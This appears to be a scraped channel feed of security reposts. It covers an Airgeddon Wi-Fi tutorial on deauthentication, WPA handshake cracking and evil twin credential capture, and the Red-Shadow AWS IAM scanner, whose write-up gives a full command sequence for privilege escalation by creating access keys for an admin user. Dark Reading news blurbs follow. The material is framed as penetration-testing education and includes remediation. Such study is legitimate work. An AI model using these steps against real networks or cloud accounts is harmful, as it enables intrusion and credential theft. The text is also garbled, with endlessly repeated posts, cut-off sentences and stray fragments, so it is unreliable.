Hacking Articles|Raj Chandel's Blog
VNC Penetration Testing
___________________________
@hacking_Attack
@Hacking_Video
VNC Penetration Testing
___________________________
@hacking_Attack
@Hacking_Video
Blogspot
VNC Penetration Testing
Hacking Articles is a very interesting blog about information security, penetration testing and vulnerability assessment managed by Raj Chandel.
Hacking Articles Tips Tricks Videos Tutorials
Photo
Hacking Articles|Raj Chandel's Blog
Wireless Penetration Testing: Airgeddon
You'll discover how to use airgedon for Wi-Fi hacking in this article. It enables the capture of the WPA/WPA2 and PKMID handshakes in order to start a brute force assault on the Wi-Fi password key. It also aids in the creation of a fictitious AP for launching Evil Twin Attack by luring clients into the captive portal. Table of Content· Install Airgeddon & Usageifconfig wlan0command. Wlan0 states that our wifi connection mode is enabled in our machine.Install Airgeddon & Usage· Full support for 2.4Ghz and 5Ghz bandsoption 3as seen in the image.option 2for Monitor mode.Note: Monitor mode is the mode for monitoring traffic, usually on a particular channel. A lot of wireless hardware is capable of ENTERing monitor mode, but the ability to set the wireless hardware into monitor mode depends on support within the wireless driver. As such, you can force many cards into monitor mode in Linux, but in Windows, you will probably need to write your own wireless network card driver.___________________________
@hacking_Attack
@Hacking_Video
Wireless Penetration Testing: Airgeddon
You'll discover how to use airgedon for Wi-Fi hacking in this article. It enables the capture of the WPA/WPA2 and PKMID handshakes in order to start a brute force assault on the Wi-Fi password key. It also aids in the creation of a fictitious AP for launching Evil Twin Attack by luring clients into the captive portal. Table of Content· Install Airgeddon & Usageifconfig wlan0command. Wlan0 states that our wifi connection mode is enabled in our machine.Install Airgeddon & Usage· Full support for 2.4Ghz and 5Ghz bandsoption 3as seen in the image.option 2for Monitor mode.Note: Monitor mode is the mode for monitoring traffic, usually on a particular channel. A lot of wireless hardware is capable of ENTERing monitor mode, but the ability to set the wireless hardware into monitor mode depends on support within the wireless driver. As such, you can force many cards into monitor mode in Linux, but in Windows, you will probably need to write your own wireless network card driver.___________________________
@hacking_Attack
@Hacking_Video
Blogspot
Wireless Penetration Testing: Airgeddon
Hacking Articles is a very interesting blog about information security, penetration testing and vulnerability assessment managed by Raj Chandel.
Hacking Articles Tips Tricks Videos Tutorials
Hacking Articles|Raj Chandel's Blog Wireless Penetration Testing: Airgeddon You'll discover how to use airgedon for Wi-Fi hacking in this article. It enables the capture of the WPA/WPA2 and PKMID handshakes in order to start a brute force assault on the Wi…
1LIuDjiMEjylVpVJZ1qFwCLcBGAsYHQ/s16000/5.png option 5to obtain the tool for capturing Handshake/PMKIDoption 6to select capture the handshake.Launch Deauthentication Attack This attack sends disassociate packets to one or more clients which are currently associated with a particular access point. Disassociating clients can be done for several reasons:option 2for Death replay attack, which will utilise deauth attack to disconnect all clients before capturing the AP-client handshake. Then, for a timeout, select a period in seconds. https://1.bp.blogspot.com/-B7SWKFs84IE/YNy0JAZYzJI/AAAAAAAAxH4/81GqGzGLsDYO6_EsgIrI4jiyXQ5-EXGyQCLcBGAsYHQ/s16000/11.png Aircrack Dictionary Attack for WPA HandshakeThe Wi-Fi password was kept in a handshake file, but because it was encrypted, we had to decrypt it to get the password. Return to the main menu by selecting option 0.option 6for the offline WPA/WPA2 decrypt menu.___________________________
@hacking_Attack
@Hacking_Video
@hacking_Attack
@Hacking_Video
Hacking Articles Tips Tricks Videos Tutorials
1LIuDjiMEjylVpVJZ1qFwCLcBGAsYHQ/s16000/5.png option 5to obtain the tool for capturing Handshake/PMKIDoption 6to select capture the handshake.Launch Deauthentication Attack This attack sends disassociate packets to one or more clients which are currently associated…
16000/17.png option 1to select Personal.option 1as shown in the image. By default, it will take last captured file to be brute force, ENTER Yto select path and BSSID the last the captured file. Then provide the path of your dictionary or rockyou.txt and press ENTERkey to start dictionary attack against WPA handshake. Airacrack Brute Force Attack for WPA HandshakeSelect option 2to conduct a brute force attack against the WPA handshake file, which will decode the packets using crunch and aircrack. By default, it will brute force the last captured file. ENTERY to pick the directory, and BSSID the last captured file. Then ENTERthe path to your dictionary or rockyou.txt and click the ENTERkey to begin a brute force attack on the WPA handshake.option 6to select the Lowercase + Numeric chars that will attempt to brute force the Wi-Fi key using an alphanumeric character set. To begin the attack, press the ENTERkey.Hashcat Rule-Based Attackfor WPA HandshakeBecause we are all familiar with the capability of hashcat, airgeddon provides the opportunity to utilise hashcat to crack the Wi-Fi key. Choose option 5and enter the path to your WPA handshake file, dictionary, or rule-based file.ENTERto start the attack, and it will try to decrypt the WPA encrypted communication.Evil Twin AttackAn evil twin is a forgery of a Wi-Fi access point (Bogus AP) that masquerades as genuine but is purposefully set up to listen in on wireless traffic. By creating a fake website and enticing[...]
___________________________
@hacking_Attack
@Hacking_Video
___________________________
@hacking_Attack
@Hacking_Video
Hacking Articles Tips Tricks Videos Tutorials
16000/17.png option 1to select Personal.option 1as shown in the image. By default, it will take last captured file to be brute force, ENTER Yto select path and BSSID the last the captured file. Then provide the path of your dictionary or rockyou.txt and press…
people to it, this type of attack can be used to obtain credentials from legitimate client.option 7for Evil Twin attack.option 2for a Deauth attack to disconnect the client from a selected AP. After that, it may ask to enable DoS pursuit mode, which we reject.yN20 ENTER key to accept the proposal./root/rajpwd.txtoption 1. Six windows will open as soon as you submit the selected option.AP:create a fake AP “raaj” for client.DHCP:Start a bogus DHCP service to provide malicious IP to the client.DNS:Initiate with the malicious DNS query Deauth:Deauthenticate the client from the original AP “raaj”.Webserver:Start a service to host the captive portal.Control:Try to sniff the Wi-Fi password once the client connects with a fake AP.___________________________
@hacking_Attack
@Hacking_Video
@hacking_Attack
@Hacking_Video
Hacking Articles Tips Tricks Videos Tutorials
people to it, this type of attack can be used to obtain credentials from legitimate client.option 7for Evil Twin attack.option 2for a Deauth attack to disconnect the client from a selected AP. After that, it may ask to enable DoS pursuit mode, which we reject.yN20…
ndows; they will dissipate after the password has been captured.option 5as shown below.press 5and wait for the script to capture SSIDs around. press Ythen ENTERthe path and done. ___________________________
@hacking_Attack
@Hacking_Video
@hacking_Attack
@Hacking_Video
Hacking Articles Tips Tricks Videos Tutorials
Photo
Hacking Articles
Wireless Penetration Testing: Airgeddon
You’ll discover how to use airgeddon for Wi-Fi hacking in this article. It enables the capture of the WPA/WPA2 and PKMID handshakes in order to start a brute force assault on the Wi-Fi password key. It also aids in the creation of a fictitious AP for launching Evil Twin Attack
The post Wireless Penetration Testing: Airgeddon appeared first on Hacking Articles.
___________________________
@hacking_Attack
@Hacking_Video
Wireless Penetration Testing: Airgeddon
You’ll discover how to use airgeddon for Wi-Fi hacking in this article. It enables the capture of the WPA/WPA2 and PKMID handshakes in order to start a brute force assault on the Wi-Fi password key. It also aids in the creation of a fictitious AP for launching Evil Twin Attack
The post Wireless Penetration Testing: Airgeddon appeared first on Hacking Articles.
___________________________
@hacking_Attack
@Hacking_Video
Hacking Articles
Wireless Penetration Testing: Airgeddon
Learn to perform wireless penetration testing using Airgeddon: capture handshakes, execute Evil Twin attacks, and crack Wi-Fi passwords.
Red-Shadow - Lightspin AWS IAM Vulnerability Scanner
http://www.kitploit.com/2021/06/red-shadow-lightspin-aws-iam.html
___________________________
@hacking_Attack
@Hacking_Video
http://www.kitploit.com/2021/06/red-shadow-lightspin-aws-iam.html
___________________________
@hacking_Attack
@Hacking_Video
KitPloit - PenTest & Hacking Tools
Red-Shadow - Lightspin AWS IAM Vulnerability Scanner
Scan your AWS IAM Configuration for shadow admins in AWS IAM based on misconfigured deny policies not affecting users in groups discovered by Lightspin's Security Research Team. The tool detects the misconfigurations (https://www.kitploit.com/search/label/Misconfigurations) in the following IAM Objects: Managed Policies Users Inline Policies Groups Inline Policies Roles Inline Policies
Research Summary
AWS IAM evaluation logic for deny policies applied to groups does not work the same way as most security engineers may be used to with other authorization (https://www.kitploit.com/search/label/Authorization) mechanisms. Suppose a policy with a group resource has an explicit deny. In that case, this will only impact group actions and not user actions, opening organizations up to misconfiguration (https://www.kitploit.com/search/label/Misconfiguration) and vulnerabilities (https://www.kitploit.com/search/label/vulnerabilities) if they assume the process to be the same as with Active Directory, for example. Example for vulnerable json policy: {
"Version": "2012-10-17",
"Statement": [
{
"Sid": "ProtectManagersByDeny",
"Effect": "Deny",
"Action": "*",
"Resource": "arn:aws:iam::123456789999:group/managers"
}
]
} In this example, the policy should deny any iam action done by users, groups, or roles with that policy attached to, towards the group called managers. The fact is that simple IAM action like iam:ChangePassword would work as the deny policy is ineffective. Link to the full security research blog (https://blog.lightspin.io/aws-iam-groups-authorization-bypass)
Detection
AWS IAM has a clear seperation between user object actions and group object actions. The following list includes the user object actions the tool is scanning over deny policies affecting groups (besides wildcard): AWS_USER_ACTIONS = ["iam:CreateUser",
"iam:GetUser",
"iam:UpdateUser",
"iam:DeleteUser",
"iam:GetUserPolicy",
"iam:PutUserPolicy",
"iam:DeleteUserPolicy",
"iam:ListUserPolicies",
"iam:AttachUserPolicy",
"iam:DetachUserPolicy",
"iam:ListAttachedUserPolicies",
"iam:SimulatePrincipalPolicy",
"iam:GetContextKeysForPrincipalPolicy",
"iam:TagUser",
"iam:UpdateSSHPublicKey",
"iam:UntagUser",
"iam:GetSSHPublicKey",
"iam:ListUserTags",
"iam:DeleteSSHPublicKey",
"iam:GetLoginProfile",
"iam: GetAccessKeyLastUsed",
"iam:UpdateLoginProfile",
"iam:UploadSigningCertificate",
"iam:DeleteLoginProfile",
"iam:ListSigningCertificates",
"iam:CreateLoginProfile",
"iam:UpdateSigningCertificate",
"iam:EnableMFADevice",
"iam:DeleteSigningCertificate",
"iam:ResyncMFADevice",
"iam:ListServiceSpecificCredentials",
"iam:ListMFADevices",
"iam:ResetServiceSpecificCredential",
"iam:DeactivateMFADevice",
"iam:CreateServiceSpecificCredential",
"iam:ChangePassword",
"iam:UpdateServiceSpecificCredential",
"iam:CreateAccessKey",
"iam:DeleteServiceSpecifi cCredential",
"iam:ListAccessKeys",
"iam:PutUserPermissionsBoundary",
"iam:UpdateAccessKey",
"iam:DeleteUserPermissionsBoundary",
___________________________
@hacking_Attack
@Hacking_Video
Research Summary
AWS IAM evaluation logic for deny policies applied to groups does not work the same way as most security engineers may be used to with other authorization (https://www.kitploit.com/search/label/Authorization) mechanisms. Suppose a policy with a group resource has an explicit deny. In that case, this will only impact group actions and not user actions, opening organizations up to misconfiguration (https://www.kitploit.com/search/label/Misconfiguration) and vulnerabilities (https://www.kitploit.com/search/label/vulnerabilities) if they assume the process to be the same as with Active Directory, for example. Example for vulnerable json policy: {
"Version": "2012-10-17",
"Statement": [
{
"Sid": "ProtectManagersByDeny",
"Effect": "Deny",
"Action": "*",
"Resource": "arn:aws:iam::123456789999:group/managers"
}
]
} In this example, the policy should deny any iam action done by users, groups, or roles with that policy attached to, towards the group called managers. The fact is that simple IAM action like iam:ChangePassword would work as the deny policy is ineffective. Link to the full security research blog (https://blog.lightspin.io/aws-iam-groups-authorization-bypass)
Detection
AWS IAM has a clear seperation between user object actions and group object actions. The following list includes the user object actions the tool is scanning over deny policies affecting groups (besides wildcard): AWS_USER_ACTIONS = ["iam:CreateUser",
"iam:GetUser",
"iam:UpdateUser",
"iam:DeleteUser",
"iam:GetUserPolicy",
"iam:PutUserPolicy",
"iam:DeleteUserPolicy",
"iam:ListUserPolicies",
"iam:AttachUserPolicy",
"iam:DetachUserPolicy",
"iam:ListAttachedUserPolicies",
"iam:SimulatePrincipalPolicy",
"iam:GetContextKeysForPrincipalPolicy",
"iam:TagUser",
"iam:UpdateSSHPublicKey",
"iam:UntagUser",
"iam:GetSSHPublicKey",
"iam:ListUserTags",
"iam:DeleteSSHPublicKey",
"iam:GetLoginProfile",
"iam: GetAccessKeyLastUsed",
"iam:UpdateLoginProfile",
"iam:UploadSigningCertificate",
"iam:DeleteLoginProfile",
"iam:ListSigningCertificates",
"iam:CreateLoginProfile",
"iam:UpdateSigningCertificate",
"iam:EnableMFADevice",
"iam:DeleteSigningCertificate",
"iam:ResyncMFADevice",
"iam:ListServiceSpecificCredentials",
"iam:ListMFADevices",
"iam:ResetServiceSpecificCredential",
"iam:DeactivateMFADevice",
"iam:CreateServiceSpecificCredential",
"iam:ChangePassword",
"iam:UpdateServiceSpecificCredential",
"iam:CreateAccessKey",
"iam:DeleteServiceSpecifi cCredential",
"iam:ListAccessKeys",
"iam:PutUserPermissionsBoundary",
"iam:UpdateAccessKey",
"iam:DeleteUserPermissionsBoundary",
___________________________
@hacking_Attack
@Hacking_Video
KitPloit - PenTest & Hacking Tools
Leading source of security tools, hacking tools, cybersecurity and network security. Learn about new tools and updates in one place.
Requirements
Red-Shadow is built with Python 3 and Boto3. The tool requires: IAM User with Access Key in OS Env (https://docs.aws.amazon.com/cli/latest/userguide/cli-configure-envvars.html) Sufficient permissions for the IAM User to run the scanner (https://github.com/lightspin-tech/red-shadow/blob/main/red-shadow-policy.json) Python 3 and pip3 installed
Installation
sudo git clone https://github.com/lightspin-tech/red-shadow.git
cd red-shadow
pip3 install -r requirements.txt
Usage
python3 red-shadow.py
Analyze Results
The results discover any IAM object that is vulnerable to such authorization bypass in AWS. Example of results output: ++ Starting Red-Shadow ++
++ AWS IAM Vulnerability Scanner
++ Red Shadow scans for shadow admins in AWS IAM based on misconfigured deny policies not affecting users in groups
Step 1: Searching for IAM Group misconfigurations in managed policies
Found potential misconfiguration at arn:aws:iam::123456789999:policy/ProtectManagers
Progress: |██████████████████████████████████████████████████| 100.0% Complete
Step 2: Searching for IAM Group misconfigurations in Users inline policies
Progress: |█████████████████████π 8;████████████████████████████| 100.0% Complete
Step 3: Searching for IAM Group misconfigurations in Groups inline policies
Progress: |██████████████████████████████████████████████████| 100.0% Complete
Step 4: Searching for IAM Group misconfigurations in Roles inline policies
Progress: |████████████████████████████████ ██████████████████| 100.0% Complete
Done In this console output, we can see that our ProtectManagers deny policy is ineffective and vulnerable to attacks such as privilege escalation mentioned above.
Simulation & Exploitation
To validate the IAM Vulnerability and run the exploitation you can run the following flow: aws iam create-group --group-name managers aws iam attach-group-policy --group-name managers --policy-arn arn:aws:iam::aws:policy/AdministratorAccess aws iam create-user --user-name JohnAdmin aws iam add-user-to-group --user-name JohnAdmin --group-name managers create a policy.json file with the contents below (replace the account id): {
"Version": "2012-10-17",
"Statement": [
{
"Sid": "ProtectManagersByDeny",
"Effect": "Deny",
"Action": "*",
"Resource": "arn:aws:iam::123456789999:group/managers"
}
]
} aws iam create-policy --policy-name ProtectManagers --policy-document file://policy.json aws iam create-group --group-name backend-dev aws iam create-user --user-name BobAttacker aws iam add-user-to-group --user-name BobAttacker --group-name backend-dev aws iam attach-group-policy --group-name backend-dev --policy-arn arn:aws:iam::123456789999:policy/ProtectManagers Create a policy to allow the users to create access keys in policy_iam.json file for the backend-dev group: {
"Version": "2012-10-17",
"Statement": [
{
"Sid": "VisualEditor0",
"Effect": "Allow",
"Action": "iam:CreateAccessKey",
"Resource": "*"
}
]
} aws iam create-policy --policy-name devCreateAccessKeys --policy-document file://policy_iam.json aws iam attach-group-policy --group-name backend-dev --policy-arn arn:aws:iam::123456789999:policy/devCreateAccessKeys Validate our configuration using: aws iam list-attached-group-policies --group backend-dev aws iam create-access-key --user-name BobAttacker Configure the new access key and secret in aws profile (locan env) Now the user BobAttacker can create access key for all resources but has an explicit deny for the managers group. Lets Exploit the vulnerability using: aws iam create-access-key --user-name JohnAdmin --profile BobAttacker Privilege Escalation Complete!
Remediation
___________________________
@hacking_Attack
@Hacking_Video
Red-Shadow is built with Python 3 and Boto3. The tool requires: IAM User with Access Key in OS Env (https://docs.aws.amazon.com/cli/latest/userguide/cli-configure-envvars.html) Sufficient permissions for the IAM User to run the scanner (https://github.com/lightspin-tech/red-shadow/blob/main/red-shadow-policy.json) Python 3 and pip3 installed
Installation
sudo git clone https://github.com/lightspin-tech/red-shadow.git
cd red-shadow
pip3 install -r requirements.txt
Usage
python3 red-shadow.py
Analyze Results
The results discover any IAM object that is vulnerable to such authorization bypass in AWS. Example of results output: ++ Starting Red-Shadow ++
++ AWS IAM Vulnerability Scanner
++ Red Shadow scans for shadow admins in AWS IAM based on misconfigured deny policies not affecting users in groups
Step 1: Searching for IAM Group misconfigurations in managed policies
Found potential misconfiguration at arn:aws:iam::123456789999:policy/ProtectManagers
Progress: |██████████████████████████████████████████████████| 100.0% Complete
Step 2: Searching for IAM Group misconfigurations in Users inline policies
Progress: |█████████████████████π 8;████████████████████████████| 100.0% Complete
Step 3: Searching for IAM Group misconfigurations in Groups inline policies
Progress: |██████████████████████████████████████████████████| 100.0% Complete
Step 4: Searching for IAM Group misconfigurations in Roles inline policies
Progress: |████████████████████████████████ ██████████████████| 100.0% Complete
Done In this console output, we can see that our ProtectManagers deny policy is ineffective and vulnerable to attacks such as privilege escalation mentioned above.
Simulation & Exploitation
To validate the IAM Vulnerability and run the exploitation you can run the following flow: aws iam create-group --group-name managers aws iam attach-group-policy --group-name managers --policy-arn arn:aws:iam::aws:policy/AdministratorAccess aws iam create-user --user-name JohnAdmin aws iam add-user-to-group --user-name JohnAdmin --group-name managers create a policy.json file with the contents below (replace the account id): {
"Version": "2012-10-17",
"Statement": [
{
"Sid": "ProtectManagersByDeny",
"Effect": "Deny",
"Action": "*",
"Resource": "arn:aws:iam::123456789999:group/managers"
}
]
} aws iam create-policy --policy-name ProtectManagers --policy-document file://policy.json aws iam create-group --group-name backend-dev aws iam create-user --user-name BobAttacker aws iam add-user-to-group --user-name BobAttacker --group-name backend-dev aws iam attach-group-policy --group-name backend-dev --policy-arn arn:aws:iam::123456789999:policy/ProtectManagers Create a policy to allow the users to create access keys in policy_iam.json file for the backend-dev group: {
"Version": "2012-10-17",
"Statement": [
{
"Sid": "VisualEditor0",
"Effect": "Allow",
"Action": "iam:CreateAccessKey",
"Resource": "*"
}
]
} aws iam create-policy --policy-name devCreateAccessKeys --policy-document file://policy_iam.json aws iam attach-group-policy --group-name backend-dev --policy-arn arn:aws:iam::123456789999:policy/devCreateAccessKeys Validate our configuration using: aws iam list-attached-group-policies --group backend-dev aws iam create-access-key --user-name BobAttacker Configure the new access key and secret in aws profile (locan env) Now the user BobAttacker can create access key for all resources but has an explicit deny for the managers group. Lets Exploit the vulnerability using: aws iam create-access-key --user-name JohnAdmin --profile BobAttacker Privilege Escalation Complete!
Remediation
___________________________
@hacking_Attack
@Hacking_Video
Amazon
Configuring environment variables for the AWS CLI - AWS Command Line Interface
Environment variables provide another way to specify configuration options and credentials, and can be useful for scripting or temporarily setting a named profile as the default.
Once you have found the policies vulnerable to the authorization bypass, there are two possible ways to remediate the vulnerability and fix the policy: OPTION 1: Define all relevant users in the resource field instead of groups to avoid ineffective iam actions, and deny all group actions, such as the following example: {
"Version": "2012-10-17",
"Statement": [
{
"Sid": "DenySpecificUserActions",
"Effect": "Deny",
"Action": [
"iam:CreateLoginProfile",
"iam:ChangePassword",
"iam:CreateAccessKey"
],
"Resource": [
"arn:aws:iam::123456789999:user/DanaH@acme.com",
"arn:aws:iam::123456789999:user/DavidZ@acme.com",
"arn:aws:iam::123456789999:user/EladS@acme.com"
]
},
{
"Sid": "DenyAllGroupActions",
"Effect": "Deny",
"Action": "*",
"Resource": "arn:aws:iam::123456789999:group/managers"
}
]
} OPTION 2: Use condition in the policy with iam:ResourceTag in place such as the following example: {
"Version": "2012-10-17",
"Statement": [
{
"Sid": "VisualEditor0",
"Effect": "Deny",
"Action": [
"iam:CreateLoginProfile",
"iam:ChangePassword",
"iam:CreateAccessKey"
],
"Resource": "*",
"Condition": {
"ForAnyValue:StringEquals": {
"iam:ResourceTag/group": "managers"
}
}
}
]
}
Contact Us
This research was held by Lightspin's Security Research Team. For more information, contact us at support@lightspin.io (mailto:support@lightspin.io).
Download Red-Shadow (https://github.com/lightspin-tech/red-shadow)
___________________________
@hacking_Attack
@Hacking_Video
"Version": "2012-10-17",
"Statement": [
{
"Sid": "DenySpecificUserActions",
"Effect": "Deny",
"Action": [
"iam:CreateLoginProfile",
"iam:ChangePassword",
"iam:CreateAccessKey"
],
"Resource": [
"arn:aws:iam::123456789999:user/DanaH@acme.com",
"arn:aws:iam::123456789999:user/DavidZ@acme.com",
"arn:aws:iam::123456789999:user/EladS@acme.com"
]
},
{
"Sid": "DenyAllGroupActions",
"Effect": "Deny",
"Action": "*",
"Resource": "arn:aws:iam::123456789999:group/managers"
}
]
} OPTION 2: Use condition in the policy with iam:ResourceTag in place such as the following example: {
"Version": "2012-10-17",
"Statement": [
{
"Sid": "VisualEditor0",
"Effect": "Deny",
"Action": [
"iam:CreateLoginProfile",
"iam:ChangePassword",
"iam:CreateAccessKey"
],
"Resource": "*",
"Condition": {
"ForAnyValue:StringEquals": {
"iam:ResourceTag/group": "managers"
}
}
}
]
}
Contact Us
This research was held by Lightspin's Security Research Team. For more information, contact us at support@lightspin.io (mailto:support@lightspin.io).
Download Red-Shadow (https://github.com/lightspin-tech/red-shadow)
___________________________
@hacking_Attack
@Hacking_Video
GitHub
GitHub - lightspin-tech/red-shadow: Lightspin AWS IAM Vulnerability Scanner
Lightspin AWS IAM Vulnerability Scanner. Contribute to lightspin-tech/red-shadow development by creating an account on GitHub.
Hacking Articles Tips Tricks Videos Tutorials
Photo
Dark Reading: Attacks/Breaches
MyBook Investigation Reveals Attackers Exploited Legacy, Zero-Day Vulnerabilities
A previously unknown flaw in Western Digital's older network-attached storage systems allowed unauthenticated commands to trigger a factory reset, formatting the hard drives, says the company after its preliminary investigation.
___________________________
@hacking_Attack
@Hacking_Video
MyBook Investigation Reveals Attackers Exploited Legacy, Zero-Day Vulnerabilities
A previously unknown flaw in Western Digital's older network-attached storage systems allowed unauthenticated commands to trigger a factory reset, formatting the hard drives, says the company after its preliminary investigation.
___________________________
@hacking_Attack
@Hacking_Video
Dark Reading
MyBook Investigation Reveals Attackers Exploited Legacy, Zero-Day Vulnerabilities
A previously unknown flaw in Western Digital's older network-attached storage systems allowed unauthenticated commands to trigger a factory reset, formatting the hard drives, says the company after its preliminary investigation.
Hacking Articles Tips Tricks Videos Tutorials
Photo
Dark Reading: Attacks/Breaches
Attackers Already Unleashing Malware for Apple macOS M1 Chip
Apple security expert Patrick Wardle found that some macOS malware written for the new M1 processor can bypass anti-malware tools.
___________________________
@hacking_Attack
@Hacking_Video
Attackers Already Unleashing Malware for Apple macOS M1 Chip
Apple security expert Patrick Wardle found that some macOS malware written for the new M1 processor can bypass anti-malware tools.
___________________________
@hacking_Attack
@Hacking_Video
Dark Reading
Attackers Already Unleashing Malware for Apple macOS M1 Chip
Apple security expert Patrick Wardle found that some macOS malware written for the new M1 processor can bypass anti-malware tools.
Hacking Articles Tips Tricks Videos Tutorials
Photo
Dark Reading: Attacks/Breaches
Impersonation Becomes Top Phishing Technique
A new report finds IT, healthcare, and manufacturing are the industries most targeted by phishing emails.
___________________________
@hacking_Attack
@Hacking_Video
Impersonation Becomes Top Phishing Technique
A new report finds IT, healthcare, and manufacturing are the industries most targeted by phishing emails.
___________________________
@hacking_Attack
@Hacking_Video